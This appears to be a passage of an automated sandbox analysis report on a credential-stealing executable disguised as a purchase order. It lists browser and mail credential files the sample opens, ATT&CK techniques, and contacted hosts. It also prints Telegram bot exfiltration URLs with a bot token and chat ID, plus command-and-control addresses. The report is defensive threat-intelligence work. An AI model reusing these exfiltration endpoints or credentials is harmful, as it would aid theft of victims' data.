                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts112
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Query Registry
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Software Packing
                  NTDS1
                  Security Software Discovery
                  Distributed Component Object Model1
                  Input Capture
                  4
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSH1
                  Clipboard Data
                  15
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials31
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                  Process Injection
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576077 Sample: PO-1124-0018- TTR-ASP1 .. 2... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 3 other IPs or domains 2->26 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 44 8 other signatures 2->44 8 PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe 4 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 file5 20 PO-1124-0018- TTR-...det 0191621.exe.log, ASCII 8->20 dropped 46 Adds a directory exclusion to Windows Defender 8->46 48 Injects a PE file into a foreign processes 8->48 12 PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 28 checkip.dyndns.com 132.226.8.169, 49734, 49738, 49740 UTMEMUS United States 12->28 30 api.telegram.org 149.154.167.220, 443, 49758, 49759 TELEGRAMRU United Kingdom 12->30 32 reallyfreegeoip.org 172.67.177.134, 443, 49736, 49737 CLOUDFLARENETUS United States 12->32 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 conhost.exe 16->18         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://www.sakkal.comPXF0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalse
                    high
                    reallyfreegeoip.org
                    172.67.177.134
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        checkip.dyndns.com
                        132.226.8.169
                        truefalse
                          high
                          checkip.dyndns.org
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              http://checkip.dyndns.org/false
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.office.com/PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.comPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designersGPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers/?PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/bThePO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.orgPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/botPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers?PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.tiro.comPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designersPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.goodfont.co.krPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstore?hl=enPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://varders.kozow.com:8081PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.carterandcone.comlPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sajatypeworks.comPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.sakkal.comPXFPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786459331.00000000054A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://aborters.duckdns.org:8081PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.typography.netDPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.fontbureau.com/designers/cabarga.htmlNPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.founder.com.cn/cn/cThePO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.galapagosdesign.com/staff/dennis.htmPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.founder.com.cn/cnPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmlPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://51.38.247.67:8081/_send_.php?LPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://anotherarmy.dns.army:8081PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://checkip.dyndns.org/qPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.jiyu-kobo.co.jp/PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.galapagosdesign.com/DPleasePO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.com/designers8PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fonts.comPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.sandoll.co.krPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.urwpp.deDPleasePO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.zhongyicts.com.cnPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.sakkal.comPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
